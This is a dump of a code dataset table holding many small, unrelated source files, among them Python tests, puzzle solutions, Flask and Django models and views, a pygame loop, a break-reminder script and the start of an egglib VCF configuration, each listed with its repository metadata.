seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5198901937 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
import unittest
import yalix.repl as repl
import yalix.utils as utils
def send_inputs(*args):
    """Build a fake input prompt that replays *args* one command at a time.

    The returned generator function takes a 1-based counter: strings are
    yielded back as commands, exception instances are raised as-is, and
    running past the end of *args* raises EOFError (end of session).
    """
    def invoke(count):
        try:
            item = args[count - 1]
            if not isinstance(item, str):
                raise item
            yield item
        except IndexError:
            raise EOFError()
    return invoke
def capture_outputs(collector):
    """Return an output-prompt callback that records results into *collector*.

    *collector* must support item assignment (dict-like); each REPL result
    is stored under its 1-based evaluation count.
    """
    def record(result, count):
        collector[count] = result
    return record
class ReplTests(unittest.TestCase):
    """Smoke tests for the yalix REPL front-end."""

    def test_license(self):
        # The license banner must be non-empty and mention the current year.
        self.assertGreater(len(repl.license()), 0)
        self.assertIn(str(datetime.now().year), repl.license())

    def test_copyright(self):
        self.assertGreater(len(repl.copyright()), 0)
        self.assertIn(str(datetime.now().year), repl.copyright())

    def test_help(self):
        self.assertGreater(len(repl.help()), 0)
        self.assertIn('github.com/rm-hull/yalix', repl.help())

    def test_init_readline(self):
        # init_readline() should report history-file handling on stdout.
        with utils.capture() as out:
            repl.init_readline({})
        self.assertIn('Reading history', out[0])
        self.assertTrue('DONE' in out[0] or 'FAILED' in out[0])

    def test_repl_starts_OK(self):
        # Feed two expressions then a Ctrl-C; the REPL should evaluate both
        # results and shut down cleanly.
        commands = send_inputs("(+ 1 2 3 4)", "(iterate inc 0)",
                               KeyboardInterrupt())
        results = {}
        collector = capture_outputs(results)
        with utils.capture() as out:
            repl.repl(inprompt=commands, outprompt=collector)
        self.assertEqual('10', results[1])
        self.assertEqual(
            '(0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ...)',
            results[2])
        self.assertIn('KeyboardInterrupt', out[0])
        self.assertIn('Bye!', out[0])
# Allow running this test module directly (e.g. ``python repl_test.py``).
if __name__ == '__main__':
    unittest.main()
| rm-hull/yalix | python/tests/repl_test.py | repl_test.py | py | 1,934 | python | en | code | 5 | github-code | 36 |
def fibonacci(n):
    """Return the n-th Fibonacci number (1-based: fibonacci(1) == fibonacci(2) == 1).

    Raises ValueError for n < 1, which the original silently answered with 1.
    """
    if n < 1:
        raise ValueError("n must be a positive integer")
    prev, curr = 1, 1
    for _ in range(2, n):
        # Tuple assignment advances the pair without a temporary variable.
        prev, curr = curr, prev + curr
    return curr
# Read the target index from stdin and print the matching Fibonacci number.
n = int(input())
print(fibonacci(n))
| bbpythoncourse/python | 4/4.4.py | 4.4.py | py | 238 | python | en | code | 0 | github-code | 36 |
41585308053 | from flask.ext.mongokit import MongoKit, Document
from datetime import datetime
from sensorapp import db, app
@db.register
class Device(Document):
    """MongoKit document describing a physical device (board/controller)."""
    __database__ = app.config["DB_NAME"]
    __collection__ = "device"
    structure = {
        'name': unicode,
        'digit_pin_num': int,
        'analog_pin_num': int,
        'type': unicode,
        'location': unicode,
        'sensor_list': list,
        'actuator_list': list,
        'created_user': unicode,
        'created_time': datetime
    }
    required_fields = ['name', 'created_time']
    # BUG FIX: pass the callable itself so the timestamp is evaluated per
    # document; calling datetime.utcnow() here froze it at import time.
    default_values = {'created_time': datetime.utcnow}
    use_dot_notation = True
@db.register
class Sensor(Document):
    """MongoKit document describing a sensor attached to a device."""
    __database__ = app.config["DB_NAME"]
    __collection__ = "sensor"
    structure = {
        'name': unicode,
        'type': unicode,
        'digit_or_analog': unicode,
        'location': unicode,
        'ability': unicode,
        'at_device_id': unicode,
        'at_device_name': unicode,
        'at_pin': int,
        'created_user': unicode,
        'created_time': datetime
    }
    required_fields = ['name', 'created_time']
    # BUG FIX: pass the callable so the timestamp is taken per document,
    # not frozen at import time.
    default_values = {'created_time': datetime.utcnow}
    use_dot_notation = True
@db.register
class Actuator(Document):
    """MongoKit document describing an actuator attached to a device."""
    __database__ = app.config["DB_NAME"]
    __collection__ = "actuator"
    structure = {
        'name': unicode,
        'type': unicode,
        'digit_or_analog': unicode,
        'location': unicode,
        'ability': unicode,
        'at_device_id': unicode,
        'at_device_name': unicode,
        'at_pin': int,
        'created_user': unicode,
        'created_time': datetime
    }
    required_fields = ['name', 'created_time']
    # BUG FIX: pass the callable so the timestamp is taken per document,
    # not frozen at import time.
    default_values = {'created_time': datetime.utcnow}
    use_dot_notation = True
@db.register
class SensorData(Document):
    """MongoKit document holding one reading produced by a sensor."""
    __database__ = app.config["DB_NAME"]
    __collection__ = "sensordata"
    structure = {
        'value': float,
        'from_sensor_id': unicode,
        'from_sensor_name': unicode,
        'sensing_time': datetime,
        'created_time': datetime
    }
    required_fields = ['value', 'from_sensor_name', 'sensing_time', 'created_time']
    # BUG FIX: pass the callable so the timestamp is taken per document,
    # not frozen at import time.
    default_values = {'created_time': datetime.utcnow}
    use_dot_notation = True
@db.register
class ActuatorData(Document):
    """MongoKit document holding one command/state applied by an actuator."""
    __database__ = app.config["DB_NAME"]
    __collection__ = "actuatordata"
    structure = {
        'value': float,
        'from_actuator_id': unicode,
        'from_actuator_name': unicode,
        'created_by': unicode,
        'acting_time': datetime,
        'created_time': datetime
    }
    required_fields = ['value', 'from_actuator_name', 'acting_time', 'created_time']
    # BUG FIX: pass the callable so the timestamp is taken per document,
    # not frozen at import time.
    default_values = {'created_time': datetime.utcnow}
    use_dot_notation = True
# NOTE(review): every class above is already registered via the @db.register
# decorator; these calls re-register them and look redundant — confirm before
# removing.
db.register([Device])
db.register([Sensor])
db.register([Actuator])
db.register([SensorData])
db.register([ActuatorData])
| janetyc/SensorIoT | sensorapp/models.py | models.py | py | 2,885 | python | en | code | 0 | github-code | 36 |
24969027415 | from typing import List
class Solution:
    def dailyTemperatures(self, temperatures: List[int]) -> List[int]:
        """For each day, return how many days until a warmer temperature
        (0 when no warmer day follows).

        Uses a monotonic (non-increasing) stack of (index, temperature)
        pairs; each index is pushed and popped at most once, so O(n).
        """
        ans = [0] * len(temperatures)
        stack = []  # (index, temperature) pairs still waiting for a warmer day
        for i, temp in enumerate(temperatures):
            # Resolve every colder day on the stack against today's reading.
            # BUG FIX: removed the leftover per-iteration debug print.
            while stack and stack[-1][1] < temp:
                index, _ = stack.pop()
                ans[index] = i - index
            stack.append((i, temp))
        return ans
# Quick manual check with the LeetCode sample input.
solver = Solution()
print(solver.dailyTemperatures(temperatures=[73, 74, 75, 71, 69, 72, 76, 73]))
| inverseTrig/leet_code | 739_daily_temperatures.py | 739_daily_temperatures.py | py | 530 | python | en | code | 0 | github-code | 36 |
def solution_long(start, length, debug=False):
    """
    Known Working Solution (reference implementation).

    XORs the first ``remaining`` worker ids of each row of the grid, where
    ``remaining`` shrinks from ``length`` down to 1, and folds the row
    checksums together with XOR.

    :param start: first worker id
    :param length: side of the (conceptual) worker grid
    :param debug: print the per-row XOR trace when True
    :return: the combined checksum, or 0 for out-of-range arguments
    """
    out_of_range = (start < 0 or start > 2000000000
                    or length < 1 or start + length > 2000000000)
    if out_of_range:
        return 0
    overall = 0
    current = start
    remaining = length
    while remaining > 0:
        trace = ''
        row_sum = 0
        for col in range(length):
            if col >= remaining:
                # Skip the tail of this row in a single jump.
                current += length - col
                break
            trace += '({0}^{1})'.format(row_sum, current)
            row_sum ^= current
            trace += '={0} '.format(row_sum)
            current += 1
        remaining -= 1
        overall ^= row_sum
        if debug:
            print(trace + ' ' + str(overall))
    return overall
def solution(start, length):
    """Optimized checksum: same result as solution_long but skips most XORs.

    Relies on the identity that for even n, n ^ (n+1) ^ (n+2) ^ (n+3) == 0
    (since n^(n+1) == 1 and (n+2)^(n+3) == 1), so whole groups of four
    consecutive ids cancel out and only the tail of each row is XORed.
    Returns 0 for out-of-range arguments.
    """
    if start < 0 or start > 2000000000 or length < 1 or start + length > 2000000000:
        return 0
    check_length = length
    running_checksum = 0
    front_worker = start
    while check_length > 0:
        if check_length > 5:
            # Cancel complete blocks of four consecutive ids.
            repeat_blocks = int(check_length / 4)
            jump_start = (repeat_blocks * 4) + front_worker
            check_from_worker_idx = (repeat_blocks * 4)
            if front_worker % 2 == 0:
                checksum = 0
            else:
                # Odd row start: realign the block boundary and seed the
                # checksum with the first id so the 4-cancellation applies.
                jump_start -= 3
                check_from_worker_idx -= 3
                checksum = front_worker
        else:
            # Short rows: just XOR everything directly.
            jump_start = front_worker
            checksum = 0
            check_from_worker_idx = 0
        # XOR the remaining (non-cancelled) ids of this row.
        while check_from_worker_idx < check_length:
            checksum ^= jump_start
            jump_start += 1
            check_from_worker_idx += 1
        front_worker += length
        check_length -= 1
        running_checksum ^= checksum
    return running_checksum
if __name__ == "__main__":
    # Compare the reference implementation against the optimized one.
    start = 3
    end = 17
    debug = True
    print('<<< old faithful >>>')
    c = solution_long(start, end, debug)
    print('<<< new one >>>')
    # BUG FIX: solution() only accepts (start, length); passing ``debug`` as
    # a third argument raised TypeError.
    c = solution(start, end)
| drewtuley/LAMBCHOP | SecurityQueue/queue_to_do.py | queue_to_do.py | py | 2,128 | python | en | code | 0 | github-code | 36 |
# Advent of Code 2018 day 8: read the whitespace-separated license numbers.
puzzle = open('puzzle', 'r').read().strip()
puzzle = list(map(int, puzzle.split()))
def get_nodes(x):
    """Recursively evaluate a node of the AoC 2018 day-8 license tree.

    ``x`` is the flattened number list starting at this node's header
    (child count, metadata count). Returns ``(value, consumed)`` where
    ``value`` is the node's part-2 value and ``consumed`` is how many
    numbers the node occupied.
    """
    child_nodes = x[0]
    metadata_entries = x[1]
    child_values = []
    value = 0
    steps = 0
    for _ in range(child_nodes):
        child_value, consumed = get_nodes(x[2 + steps:])
        child_values.append(child_value)
        steps += consumed
    metadata = x[2 + steps: 2 + steps + metadata_entries]
    if child_nodes == 0:
        # Leaf node: the value is simply the sum of its metadata entries.
        value = sum(metadata)
    else:
        for v in metadata:
            # BUG FIX: a metadata entry of 0 refers to no child and must be
            # skipped; the old ``v-1 < len(ret)`` test let 0 index ret[-1].
            if 1 <= v <= len(child_values):
                value += child_values[v - 1]
    steps += 2 + metadata_entries
    return value, steps
print(get_nodes(puzzle)[0]) | filipmlynarski/Advent-of-Code-2018 | day_08/day_8_part_2.py | day_8_part_2.py | py | 549 | python | en | code | 0 | github-code | 36 |
25955407466 | import time
class Profiler:
    '''
    A small profiler class for measuring how long a block of code runs.
    This should be used like:
    ```
    with Profiler('label'):
        # code to run here
    ```
    and will automatically print runtime information. Additionally, if
    multiple `with` blocks are nested they will be displayed hierarchically.
    '''

    enabled = True     # global switch; set False to make profilers no-ops
    current = None     # innermost active Profiler (top of the nesting stack)
    tab_width = 2      # spaces per nesting level in the printed report

    def __init__(self, section_name):
        self.section_name = section_name
        self.children = []

    def __enter__(self):
        if not Profiler.enabled:
            # BUG FIX: still return self so ``with Profiler(...) as p``
            # binds a Profiler even when profiling is disabled.
            return self
        self.parent = Profiler.current
        if self.parent is not None:
            self.parent.children.append(self)
        Profiler.current = self
        self.start_time = time.time()
        return self

    def print_recursive(self, level):
        """Print this section's runtime, then its children, indented."""
        indent = (level * Profiler.tab_width) * ' '
        print(indent + f'[{self.section_name}] {self.running_time:.5f}s')
        for child in self.children:
            child.print_recursive(level + 1)

    def __exit__(self, type, value, tb):
        if not Profiler.enabled:
            # Returning False propagates any exception unchanged.
            return False
        self.running_time = time.time() - self.start_time
        # BUG FIX: restore the nesting stack *before* any early exit, so an
        # exception inside the block no longer leaves Profiler.current
        # pointing at a finished section.
        Profiler.current = self.parent
        if type is not None:
            # Propagate the exception with its original traceback intact
            # (the old ``raise value`` skipped the bookkeeping above).
            return False
        if self.parent is None:
            self.print_recursive(0)
        return True
| nicknytko/numml | numml/profiler.py | profiler.py | py | 1,389 | python | en | code | 9 | github-code | 36 |
11685619050 | from django.shortcuts import render
from django.shortcuts import render,redirect
from django.contrib.auth.forms import UserCreationForm,AuthenticationForm
# from .models import Device
from django.contrib.auth import authenticate
from django.contrib.auth import login
#from .forms import SignUpForm
from django.core.mail import send_mail
from django.conf import settings
from rest_framework.decorators import api_view
import csv,io
from .forms import *
from .models import *
from django.views.generic import TemplateView
from django.shortcuts import get_object_or_404
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
def signup_view(request):
    """Register a new user and e-mail a confirmation.

    GET renders an empty sign-up form; POST validates, saves the user and
    sends a welcome mail to the submitted address.
    """
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            print("Saved user")
            username = form.cleaned_data.get('username')
            raw_password = form.cleaned_data.get('password1')
            to_email= form.cleaned_data.get('email')
            # NOTE(review): this prints the raw password to stdout — a
            # credential leak in logs; confirm and remove.
            print(username,raw_password)
            # NOTE(review): ``user`` is never used afterwards — the account
            # is authenticated but not logged in; confirm whether a login()
            # call or a redirect was intended here.
            user = authenticate(username=username, password=raw_password)
            send_mail(
                'Congratulations',
                'Congratulations you are now registered',
                settings.EMAIL_HOST_USER,
                [to_email],
                fail_silently=False,
            )
    else:
        form = SignUpForm()
    return render(request,'newops/signup.html',{'form':form})
def login_view(request):
    """Authenticate a user; on success render the hello page."""
    if request.method == "POST":
        form = AuthenticationForm(data=request.POST)
        if form.is_valid():
            login(request, form.get_user())
            return render(request,'newops/hello.html')
    else:
        form = AuthenticationForm()
    return render(request,'newops/login.html',{'form':form})
def hello(request):
    """Render the post-login landing page."""
    return render(request,'newops/hello.html')
#API
class ApplicationDetail(APIView):
    """API endpoint creating an Application from posted form data."""
    def post(self, request):
        print(request.data)
        Application.objects.create(app_name = request.data.get('app_name'),app_function = request.data.get('app_function'),app_type = request.data.get('app_type'))
        return redirect('../hello')
def details(request):
    """Render the Application creation form."""
    return render(request,'newops/applicationapi.html')
class AssestDetail(APIView):
    """API endpoint creating an AssetGroup and linking its M2M relations."""
    def post(self, request):
        # Multi-valued form fields arrive as lists.
        customer_id_list = request.data.getlist('Customer_ID_id')
        app_name_list = request.data.getlist('app_name')
        page_list = request.data.getlist('page_name')
        device_list = request.data.getlist('device_registration_name')
        # Resolve customer names to instances (raises DoesNotExist on a bad name).
        for i in range(len(customer_id_list)):
            customer_id_list[i] = Customer.objects.get(company_name=customer_id_list[i])
        # NOTE(review): only the first selected customer is stored; confirm
        # that ignoring additional selections is intended.
        obj = AssetGroup.objects.create(assestname = request.data.get('assestname'),Customer_ID = customer_id_list[0])
        for i in range(len(page_list)):
            obj.pagename.add(Pages.objects.filter(page_name=page_list[i]).first())
        for i in range(len(device_list)):
            obj.devicename.add(Device.objects.filter(device_registration_name=device_list[i]).first())
        for i in range(len(app_name_list)):
            obj.appname.add(Application.objects.filter(app_name=app_name_list[i]).first())
        obj.save()
        return redirect('../hello')
def assestdetails(request):
    """Render the AssetGroup creation form with all selectable relations."""
    return render(request,'newops/assestgroupapi.html',{'customerquery':Customer.objects.all(),'appquery':Application.objects.all(),'pagequery':Pages.objects.all(),'devicequery':Device.objects.all()})
class DeviceSpecDetail(APIView):
    """API endpoint creating a DeviceSpecification from posted form data."""
    def post(self, request):
        DeviceSpecification.objects.create(techSpecificationID = request.data.get('techSpecificationID'),
        techSpecificationName = request.data.get('techSpecificationName'),device_type = request.data.get('device_type'),
        gps=request.data.get('gps'),gsm=request.data.get('gsm'),wifi=request.data.get('wifi'),ble=request.data.get('ble'),
        # BUG FIX: ``zigwave`` previously copied the 'zigbee' form field.
        zigbee=request.data.get('zigbee'),zigwave=request.data.get('zigwave'),rs_232=request.data.get('rs_232'),
        rs_485=request.data.get('rs_485'),rs_422=request.data.get('rs_422'),tcp=request.data.get('tcp'),mqtt=request.data.get('mqtt'),
        http=request.data.get('http'),symetric_key=request.data.get('symetric_key'),x509_Certificate=request.data.get('x509_Certificate'),
        ota=request.data.get('ota'),inputs=request.data.get('inputs'),outputs=request.data.get('outputs'),ethernet=request.data.get('ethernet'),
        analog_input=request.data.get('analog_input'),power_supply=request.data.get('power_supply'),other1=request.data.get('other1'),
        other2=request.data.get('other2'),other3=request.data.get('other3'),security_key=request.data.get('security_key'))
        return redirect('../hello')
def devicespec_details(request):
    """Render the DeviceSpecification creation form."""
    return render(request,'newops/devicespecapi.html')
class VendorDetail(APIView):
    """API endpoint creating a Vendor from posted form data."""
    def post(self, request):
        Vendor.objects.create(vendor_name=request.data.get('vendor_name'),vendor_address=request.data.get('vendor_address'),
        vendor_city=request.data.get('vendor_city'),vendor_country=request.data.get('vendor_country'),zip_code=request.data.get('zip_code'),
        vendor_contact=request.data.get('vendor_contact'),vendor_email=request.data.get('vendor_email'),web=request.data.get('web'),
        vendor_VAT=request.data.get('vendor_VAT'),vendor_other1=request.data.get('vendor_other1'),vendor_other2=request.data.get('vendor_other2'),
        # BUG FIX: ``vendor_other3`` previously copied the 'vendor_other2' field.
        vendor_other3=request.data.get('vendor_other3'))
        return redirect('../hello')
def vendor_details(request):
    """Render the Vendor creation form."""
    return render(request,'newops/vendorapi.html')
class IAMDetail(APIView):
    """API endpoint creating a Device_IAM_Mechanism entry."""
    def post(self, request):
        Device_IAM_Mechanism.objects.create(IAM=request.data.get('IAM'))
        return redirect('../hello')
def IAM_details(request):
    """Render the IAM mechanism creation form."""
    return render(request,'newops/iamapi.html')
class DPSDetail(APIView):
    """API endpoint creating a DPS_Property from posted form data."""
    def post(self,request):
        DPS_Property.objects.create(dps_name=request.data.get('dps_name'),resourse_type=request.data.get('resourse_type'),
        location=request.data.get('location'),location_ID=request.data.get('location_ID'),resourse_ID=request.data.get('resourse_ID'),
        resourse_group=request.data.get('resourse_group'),resourse_group_id=request.data.get('resourse_group_id'),subscription=request.data.get('subscription'),
        subscription_id=request.data.get('subscription_id'))
        return redirect('../hello')
def DPS_details(request):
    """Render the DPS property creation form."""
    return render(request,'newops/dpsapi.html')
class usergroupDetail(APIView):
    """API endpoint creating a UserGroup with its role flags."""
    def post(self,request):
        UserGroup.objects.create(usergroup=request.data.get('usergroup'),superadmin=request.data.get('superadmin'),
        admin=request.data.get('admin'),localadmin=request.data.get('localadmin'),manager=request.data.get('manager'),
        supervisor=request.data.get('supervisor'),operator=request.data.get('operator'),support=request.data.get('support'),
        staff=request.data.get('staff'),other1=request.data.get('other1'),other2=request.data.get('other2'))
        return redirect('../hello')
def Usergroup_details(request):
    """Render the user-group creation form."""
    return render(request,'newops/usergroupapi.html')
class IotDetail(APIView):
    """API endpoint creating an IOT_Hub linked to a DPS resource group."""
    def post(self,request):
        resourse_group_list = request.data.getlist('resourse_group')
        print(resourse_group_list)
        # Resolve resource-group names to DPS_Property rows (None on a miss).
        for i in range(len(resourse_group_list)):
            resourse_group_list[i] = DPS_Property.objects.filter(resourse_group=resourse_group_list[i]).first()
        # NOTE(review): only the first resource group is used.
        IOT_Hub.objects.create(hub_name=request.data.get('hub_name'),hostname=request.data.get('hostname'),status=request.data.get('status'),
        current_location=request.data.get('current_location'),subscription=request.data.get('subscription'),resourse_group=resourse_group_list[0])
        return redirect('../hello')
def IOT_details(request):
    """Render the IoT hub creation form with selectable DPS properties."""
    return render(request,'newops/iotapi.html',{'dpsquery':DPS_Property.objects.all()})
class CADetail(APIView):
    """API endpoint creating a certificate-authority (CA) type entry."""
    def post(self,request):
        CA.objects.create(CAtype=request.data.get('CAtype'))
        return redirect('../hello')
def CA_details(request):
    """Render the CA creation form."""
    return render(request,'newops/caapi.html')
class UserTypeDetail(APIView):
    """API endpoint creating a Usertype entry."""
    def post(self,request):
        Usertype.objects.create(user_type=request.data.get('user_type'))
        return redirect('../hello')
def Usertype_details(request):
    """Render the user-type creation form."""
    return render(request,'newops/usertypeapi.html')
class PermissionDetail(APIView):
    """API endpoint creating a Permissions entry with its flag set."""
    def post(self,request):
        Permissions.objects.create(permission_name=request.data.get('permission_name'),add_permission=request.data.get('add_permission'),
        edit_permission=request.data.get('edit_permission'),modify_permission=request.data.get('modify_permission'),
        view_permission=request.data.get('view_permission'),log_permission=request.data.get('log_permission'),delete_permission=request.data.get('delete_permission'))
        return redirect('../hello')
def Permission_details(request):
    """Render the permission creation form."""
    return render(request,'newops/permissionapi.html')
class CustomerDetail(APIView):
    """API endpoint creating a Customer with company/site/contact details."""
    def post(self,request):
        app_list = request.data.getlist('application')
        print(app_list)
        # Resolve application names to instances (None when not found).
        for i in range(len(app_list)):
            app_list[i] = Application.objects.filter(app_name=app_list[i]).first()
        # NOTE(review): only the first selected application is stored.
        Customer.objects.create(company_name=request.data.get('company_name'),address=request.data.get('address'),city=request.data.get('city'),
        country=request.data.get('country'),zip_code=request.data.get('zip_code'),primary_contact_person=request.data.get('primary_contact_person'),
        designation=request.data.get('designation'),primary_email=request.data.get('primary_email'),secondary_contact_person=request.data.get('secondary_contact_person'),
        s_designation=request.data.get('s_designation'),secondary_email=request.data.get('secondary_email'),website=request.data.get('website'),
        gst=request.data.get('gst'),vat=request.data.get('vat'),installation_mode=request.data.get('installation_mode'),no_of_site=request.data.get('no_of_site'),
        site1=request.data.get('site1'),site2=request.data.get('site2'),site3=request.data.get('site3'),address_site1=request.data.get('address_site1'),
        address_site2=request.data.get('address_site2'),address_site3=request.data.get('address_site3'),city_site1=request.data.get('city_site1'),city_site2=request.data.get('city_site2'),
        city_site3=request.data.get('city_site3'),country_site1=request.data.get('country_site1'),country_site2=request.data.get('country_site2'),country_site3=request.data.get('country_site3'),
        application=app_list[0])
        return redirect('../hello')
def Customer_details(request):
    """Render the customer creation form with selectable applications."""
    return render(request,'newops/customerapi.html',{'appquery':Application.objects.all()})
class CertificateDetail(APIView):
    """API endpoint creating a Certificate linked to a CA and a device."""
    def post(self,request):
        ca_list = request.data.getlist('ca_name')
        device_list = request.data.getlist('assignedTo')
        for i in range(len(ca_list)):
            ca_list[i] = CA.objects.filter(CAtype=ca_list[i]).first()
        # NOTE(review): devices are looked up by ``Firmware_version`` here —
        # looks like it should match a device name/serial; confirm the field.
        for i in range(len(device_list)):
            device_list[i] = Device.objects.filter(Firmware_version=device_list[i]).first()
        Certificate.objects.create(certificate_name=request.data.get('certificate_name'),certFile_type=request.data.get('certFile_type'),
        generatedOn=request.data.get('generatedOn'),validity=request.data.get('validity'),uploadedOn=request.data.get('uploadedOn'),assigned=request.data.get('assigned'),
        assignedDate=request.data.get('assignedDate'),assignedTo=device_list[0],ca_name=ca_list[0])
        return redirect('../hello')
def Certificate_details(request):
    """Render the certificate creation form with CA and device choices."""
    return render(request,'newops/certificateapi.html',{'caquery':CA.objects.all(),'devicequery':Device.objects.all()})
class DeviceDetail(APIView):
    """API endpoint creating a Device and wiring all of its foreign keys."""
    def post(self,request):
        # Each selector posts a list of display names that must be resolved
        # back to model instances before the Device row can be created.
        iothublist = request.data.getlist('iot_hub_name')
        dpslist = request.data.getlist('dps_property_ID')
        vendorlist = request.data.getlist('vendor')
        customerlist = request.data.getlist('sold_to_customer')
        applist = request.data.getlist('route_to_application')
        devicespeclist = request.data.getlist('device_Specification_ID')
        IAMlist = request.data.getlist('device_IAM_mechanism')
        # NOTE(review): .get() raises DoesNotExist on a bad/missing name —
        # there is no error handling here; confirm this is acceptable.
        for i in range(len(iothublist)):
            iothublist[i] = IOT_Hub.objects.get(hub_name=iothublist[i])
        for i in range(len(dpslist)):
            dpslist[i] = DPS_Property.objects.get(dps_name=dpslist[i])
        for i in range(len(vendorlist)):
            vendorlist[i] = Vendor.objects.get(vendor_name=vendorlist[i])
        for i in range(len(customerlist)):
            customerlist[i] = Customer.objects.get(company_name=customerlist[i])
        for i in range(len(applist)):
            applist[i] = Application.objects.get(app_name=applist[i])
        for i in range(len(devicespeclist)):
            devicespeclist[i] = DeviceSpecification.objects.get(device_type=devicespeclist[i])
        # Only the first selection of each relation is stored on the Device.
        obj = Device.objects.create(device_type = request.data.get('device_type'),enrollment_type=request.data.get('enrollment_type'),
        device_registration_name=request.data.get('device_registration_name'),iot_hub_name=iothublist[0],dps_property_ID=dpslist[0],
        allocation_policy=request.data.get('allocation_policy'),secret_storage=request.data.get('secret_storage'),
        operation=request.data.get('operation'),vendor=vendorlist[0],make=request.data.get('make'),model=request.data.get('model'),
        serial_number=request.data.get('serial_number'),date_of_purchase=request.data.get('date_of_purchase'),
        warrenty_period=request.data.get('warrenty_period'),warrenty_expiry=request.data.get('warrenty_expiry'),
        Firmware_version=request.data.get('Firmware_version'),sold_to_customer=customerlist[0],route_to_application=applist[0],configured=request.data.get('configured'),
        device_Specification_ID=devicespeclist[0])
        # IAM mechanisms are a many-to-many relation, added after creation.
        for i in range(len(IAMlist)):
            obj.device_IAM_mechanism.add(Device_IAM_Mechanism.objects.filter(IAM=IAMlist[i]).first())
        obj.save()
        return redirect('../hello')
def devicedetails(request):
    """Render the device creation form with all selectable relations."""
    return render(request,'newops/deviceapi.html',{'customerquery':Customer.objects.all(),'appquery':Application.objects.all(),'iotquery':IOT_Hub.objects.all(),'devicequery':Device.objects.all(),
    'vendorquery':Vendor.objects.all(),'IAMquery':Device_IAM_Mechanism.objects.all(),'dpsquery':DPS_Property.objects.all()})
| sanjolisogani/new_ops | newops/views.py | views.py | py | 14,804 | python | en | code | 0 | github-code | 36 |
13419956267 | import pygame,sys
from Room import Room,Overworld
class Game:
    """Top-level state machine switching between the overworld and a room."""

    def __init__(self) -> None:
        self.current_room = 0
        self.overworld = Overworld(screen, self.start_game)
        self.status = 'overworld'

    def start_game(self):
        """Enter the current room (callback handed to the overworld)."""
        self.room = Room(self.current_room, self.create_overworld)
        self.status = "game_running"

    def create_overworld(self):
        """Return to the overworld (callback handed to the room)."""
        self.overworld = Overworld(screen, self.start_game)
        self.status = 'overworld'

    def run(self):
        """Advance whichever scene is currently active."""
        active = self.overworld if self.status == 'overworld' else self.room
        active.run()
# --- bootstrap: window, caption and the game state machine -----------------
pygame.init()
screen = pygame.display.set_mode((900,506))
pygame.display.set_caption('Text Based Game')
game = Game()
# Main loop: pump the event queue, advance the active scene, flip the frame.
while True:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
    game.run()
    pygame.display.update()
| NishantK30/projects | text based game/main.py | main.py | py | 960 | python | en | code | 0 | github-code | 36 |
# Healthy programmer
# Working hours: 9am - 5pm
# Water = waters.mp3 (3.5 litres) every 40 min - "drank" stops it - logged
# Eyes = eyes.mp3 (every 30 min) - "doneeyes" stops it - logged
# Physical activity = excercise.mp3 (every 45 min) - "doneex" stops it - logged
#
# Rules - pygame module is used to play the audio alarms
from pygame import mixer
from datetime import datetime
from time import time
def musiconloop(file, stopper):
    """Play ``file`` on repeat until the user types ``stopper``.

    Blocks reading stdin; any other input is ignored and the alarm keeps
    playing.
    """
    mixer.init()
    mixer.music.load(file)
    # BUG FIX: loop the alarm (-1 = repeat indefinitely) instead of playing
    # it once — the function is named "musiconloop" and must nag until
    # stopped.
    mixer.music.play(-1)
    while True:
        user_input = input()
        if user_input == stopper:
            mixer.music.stop()
            break
def log_now(msg):
    """Append ``msg`` followed by the current timestamp to the activity log."""
    with open("mylogs.txt", "a") as log_file:
        log_file.write(f"{msg} {datetime.now()}\n")
if __name__ == '__main__':
    # Timestamps of the last triggered reminder for each activity.
    init_waters = time()
    init_eyes = time()
    init_exercise = time()
    # Reminder intervals in seconds.
    # NOTE(review): these values do not match the trailing comments (10 s is
    # not 40 min) — presumably shortened for testing; confirm before release.
    watersecs = 10 #40min
    eyessecs = 30 #30 min
    exsecs = 50 #45 min
    # Poll forever; whichever interval has elapsed fires its alarm, blocks
    # until acknowledged, then resets its timer and appends a log entry.
    while True:
        if time() - init_waters > watersecs:
            print ("Drink Water!! ..Write 'drank' to stop the alarm")
            musiconloop('waters.mp3' ,'drank')
            init_waters = time()
            log_now("Drank water at")
        if time() - init_eyes > eyessecs:
            print ("Eyes Exercise time!! ..Write 'doneeyes' to stop the alarm")
            musiconloop('eyes.mp3' ,'doneeyes')
            init_eyes = time()
            log_now("Eyes relaxed done at")
        if time() - init_exercise > exsecs:
            print ("Exercise Time!! ..Write 'doneex' to stop the alarm")
            musiconloop('excercise.mp3' ,'doneex')
            init_exercise = time()
            log_now("Exercise done at")
| entbappy/My-python-projects | Ex7 Healty programmer50.py | Ex7 Healty programmer50.py | py | 1,582 | python | en | code | 2 | github-code | 36 |
28069150292 | # 2021-10-15
# 출처 : https://programmers.co.kr/learn/courses/30/lessons/86491
# 위클리 챌린지 - 8주차_최소직사각형
# Sample inputs (first kept for reference; expected answers: 4000 and 120).
#sizes=[[60, 50], [30, 70], [60, 30], [80, 40]]
sizes=[[10, 7], [12, 3], [8, 15], [14, 7], [5, 15]]
def solution(sizes):
    """Return the area of the smallest wallet fitting every business card.

    Cards may be rotated 90 degrees, so only the largest long side and the
    largest short side across all cards determine the wallet dimensions.
    """
    longest = max(max(w, h) for w, h in sizes)
    widest = max(min(w, h) for w, h in sizes)
    return longest * widest
print(solution(sizes)) | hwanginbeom/algorithm_study | WeeklyChallenge/WeeklyChallenge08_kyounglin.py | WeeklyChallenge08_kyounglin.py | py | 517 | python | en | code | 3 | github-code | 36 |
21953618118 | """
Process the VCF file to compute observed values of statistics and
estimate misorientation rate
"""
import sys

import egglib
##### PARAMETERS AND CONFIGURATION #####################################
# Input VCF with all samples plus the outgroup.
fname = '/home/flavia/flavia_data2/2023/demography/egglib/filtered_genotyped_combined_outgroup_208samples_pass_filter5_renamed.vcf'
# Sample names per population (NAM = North America, BR = Brazil, EUR = Europe).
